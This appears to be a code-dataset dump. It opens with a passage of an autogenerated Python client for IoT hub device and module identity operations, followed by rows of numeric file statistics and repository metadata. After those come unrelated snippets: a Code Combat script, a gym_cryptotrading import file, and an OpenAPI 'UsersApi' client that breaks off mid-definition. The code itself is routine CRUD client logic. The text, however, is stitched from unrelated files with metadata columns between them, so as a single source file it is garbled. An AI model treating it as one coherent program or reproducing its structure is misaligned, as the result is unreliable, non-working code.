header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(device, 'Device')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Device', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_device.metadata = {'url': '/devices/{id}'}
def delete_device(
self, id, if_match=None, custom_headers=None, raw=False, **operation_config):
"""Delete the identity of a device from the identity registry of an IoT
hub.
Delete the identity of a device from the identity registry of an IoT
hub. This request requires the If-Match header. The client may specify
the ETag for the device identity on the request in order to compare to
the ETag maintained by the service for the purpose of optimistic
concurrency. The delete operation is performed only if the ETag sent by
the client matches the value maintained by the server, indicating that
the device identity has not been modified since it was retrieved by the
client. To force an unconditional delete, set If-Match to the wildcard
character (*).
:param id: Device ID.
:type id: str
:param if_match:
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.delete_device.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_device.metadata = {'url': '/devices/{id}'}
def purge_command_queue(
self, id, custom_headers=None, raw=False, **operation_config):
"""Deletes all the pending commands for this device from the IoT hub.
Deletes all the pending commands for this device from the IoT hub.
:param id: Device ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PurgeMessageQueueResult or ClientRawResponse if raw=true
:rtype: ~service.models.PurgeMessageQueueResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.purge_command_queue.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PurgeMessageQueueResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
purge_command_queue.metadata = {'url': '/devices/{id}/commands'}
def get_modules_on_device(
self, id, custom_headers=None, raw=False, **operation_config):
"""Retrieve all the module identities on the device.
:param id: Device ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~service.models.Module] or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_modules_on_device.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Module]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_modules_on_device.metadata = {'url': '/devices/{id}/modules'}
def get_module(
self, id, mid, custom_headers=None, raw=False, **operation_config):
"""Retrieve the specified module identity on the device.
:param id: Device ID.
:type id: str
:param mid: Module ID.
:type mid: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Module or ClientRawResponse if raw=true
:rtype: ~service.models.Module or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_module.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
'mid': self._serialize.url("mid", mid, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Module', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_module.metadata = {'url': '/devices/{id}/modules/{mid}'}
def create_or_update_module(
self, id, mid, module, if_match=None, custom_headers=None, raw=False, **operation_config):
"""Create or update the module identity for device in IoT hub. An ETag
must not be specified for the create operation. An ETag must be
specified for the update operation. Note that moduleId and generation
cannot be updated by the user.
:param id: Device ID.
:type id: str
:param mid: Module ID.
:type mid: str
:param module:
:type module: ~service.models.Module
:param if_match:
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Module or ClientRawResponse if raw=true
:rtype: ~service.models.Module or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.create_or_update_module.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
'mid': self._serialize.url("mid", mid, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(module, 'Module')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Module', response)
if response.status_code == 201:
deserialized = self._deserialize('Module', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update_module.metadata = {'url': '/devices/{id}/modules/{mid}'}
def delete_module(
self, id, mid, if_match=None, custom_headers=None, raw=False, **operation_config):
"""Delete the module identity for device of an IoT hub. This request
requires the If-Match header. The client may specify the ETag for the
device identity on the request in order to compare to the ETag
maintained by the service for the purpose of optimistic concurrency.
The delete operation is performed only if the ETag sent by the client
matches the value maintained by the server, indicating that the device
identity has not been modified since it was retrieved by the client. To
force an unconditional delete, set If-Match to the wildcard character
(*).
:param id: Device ID.
:type id: str
:param mid: Module ID.
:type mid: str
:param if_match:
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.delete_module.metadata['url']
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
'mid': self._serialize.url("mid", mid, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_module.metadata = {'url': '/devices/{id}/modules/{mid}'}
| 43.762238 | 140 | 0.661447 | 4,289 | 37,548 | 5.62602 | 0.064118 | 0.057024 | 0.02586 | 0.03879 | 0.885993 | 0.868297 | 0.854414 | 0.850601 | 0.832201 | 0.828388 | 0 | 0.00447 | 0.243395 | 37,548 | 857 | 141 | 43.813302 | 0.844908 | 0.329072 | 0 | 0.784841 | 0 | 0 | 0.113604 | 0.03602 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03423 | false | 0 | 0.012225 | 0 | 0.107579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4dee1a1c81fe458b149eec602646202ca05e685e | 77 | py | Python | 4_Backwoods_Forest/103-Burls_Beets_Booleans/burls.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 4_Backwoods_Forest/103-Burls_Beets_Booleans/burls.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 4_Backwoods_Forest/103-Burls_Beets_Booleans/burls.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | hero.say(False)
hero.say(True)
hero.say(False)
hero.say(True)
hero.say(True)
| 12.833333 | 15 | 0.74026 | 15 | 77 | 3.8 | 0.266667 | 0.614035 | 0.578947 | 0.561404 | 0.929825 | 0.929825 | 0.929825 | 0.929825 | 0 | 0 | 0 | 0 | 0.064935 | 77 | 5 | 16 | 15.4 | 0.791667 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
151b05cdd1ff6a5d241b1932ee4598cdc3bef73b | 121 | py | Python | gym_cryptotrading/spaces/__init__.py | datafields-team/gym-cryptotrading | 96cf28b07175fb2fbf2daa7060494db81ea8d58d | [
"MIT"
] | 104 | 2018-04-26T06:30:45.000Z | 2022-03-31T17:58:33.000Z | gym_cryptotrading/spaces/__init__.py | datafields-team/gym-cryptotrading | 96cf28b07175fb2fbf2daa7060494db81ea8d58d | [
"MIT"
] | 1 | 2018-06-21T06:06:17.000Z | 2019-02-09T20:23:17.000Z | gym_cryptotrading/spaces/__init__.py | perara/gym-cryptotrading | 96cf28b07175fb2fbf2daa7060494db81ea8d58d | [
"MIT"
] | 42 | 2018-05-04T12:00:35.000Z | 2022-03-30T18:33:08.000Z | from gym_cryptotrading.spaces.action import ActionSpace
from gym_cryptotrading.spaces.observation import ObservationSpace | 60.5 | 65 | 0.909091 | 14 | 121 | 7.714286 | 0.642857 | 0.12963 | 0.37037 | 0.481481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057851 | 121 | 2 | 65 | 60.5 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1289e9fe2e934662061984d10ae479084771d4cd | 30,130 | py | Python | openapi_client/api/users_api.py | osuka/dognews-scraper | 12373064061157083a48ced8e2cabf9d1ace30a5 | [
"MIT"
] | 1 | 2019-11-15T13:19:36.000Z | 2019-11-15T13:19:36.000Z | openapi_client/api/users_api.py | osuka/news-extractor | 12373064061157083a48ced8e2cabf9d1ace30a5 | [
"MIT"
] | null | null | null | openapi_client/api/users_api.py | osuka/news-extractor | 12373064061157083a48ced8e2cabf9d1ace30a5 | [
"MIT"
] | null | null | null | """
Dognews Server API
Dognews Server client API # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from openapi_client.api_client import ApiClient, Endpoint as _Endpoint
from openapi_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from openapi_client.model.paginated_user_list import PaginatedUserList
from openapi_client.model.patched_user import PatchedUser
from openapi_client.model.user import User
class UsersApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __users_create(
self,
user,
**kwargs
):
"""users_create # noqa: E501
**Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_create(user, async_req=True)
>>> result = thread.get()
Args:
user (User):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
User
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['user'] = \
user
return self.call_with_http_info(**kwargs)
self.users_create = _Endpoint(
settings={
'response_type': (User,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/users',
'operation_id': 'users_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'user',
],
'required': [
'user',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'user':
(User,),
},
'attribute_map': {
},
'location_map': {
'user': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__users_create
)
def __users_destroy(
self,
id,
**kwargs
):
"""users_destroy # noqa: E501
**Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_destroy(id, async_req=True)
>>> result = thread.get()
Args:
id (int): A unique integer value identifying this user.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.users_destroy = _Endpoint(
settings={
'response_type': None,
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/users/{id}',
'operation_id': 'users_destroy',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [],
},
api_client=api_client,
callable=__users_destroy
)
def __users_list(
self,
**kwargs
):
"""users_list # noqa: E501
**Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_list(async_req=True)
>>> result = thread.get()
Keyword Args:
limit (int): Number of results to return per page.. [optional]
offset (int): The initial index from which to return the results.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PaginatedUserList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.users_list = _Endpoint(
settings={
'response_type': (PaginatedUserList,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/users',
'operation_id': 'users_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'limit',
'offset',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'limit':
(int,),
'offset':
(int,),
},
'attribute_map': {
'limit': 'limit',
'offset': 'offset',
},
'location_map': {
'limit': 'query',
'offset': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__users_list
)
def __users_partial_update(
self,
id,
**kwargs
):
"""users_partial_update # noqa: E501
**Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_partial_update(id, async_req=True)
>>> result = thread.get()
Args:
id (int): A unique integer value identifying this user.
Keyword Args:
patched_user (PatchedUser): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
User
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.users_partial_update = _Endpoint(
settings={
'response_type': (User,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/users/{id}',
'operation_id': 'users_partial_update',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'id',
'patched_user',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
'patched_user':
(PatchedUser,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'patched_user': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__users_partial_update
)
def __users_retrieve(
self,
id,
**kwargs
):
"""users_retrieve # noqa: E501
**Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_retrieve(id, async_req=True)
>>> result = thread.get()
Args:
id (int): A unique integer value identifying this user.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
User
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.users_retrieve = _Endpoint(
settings={
'response_type': (User,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/users/{id}',
'operation_id': 'users_retrieve',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__users_retrieve
)
def __users_update(
self,
id,
user,
**kwargs
):
"""users_update # noqa: E501
**Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.users_update(id, user, async_req=True)
>>> result = thread.get()
Args:
id (int): A unique integer value identifying this user.
user (User):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
User
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
kwargs['user'] = \
user
return self.call_with_http_info(**kwargs)
self.users_update = _Endpoint(
settings={
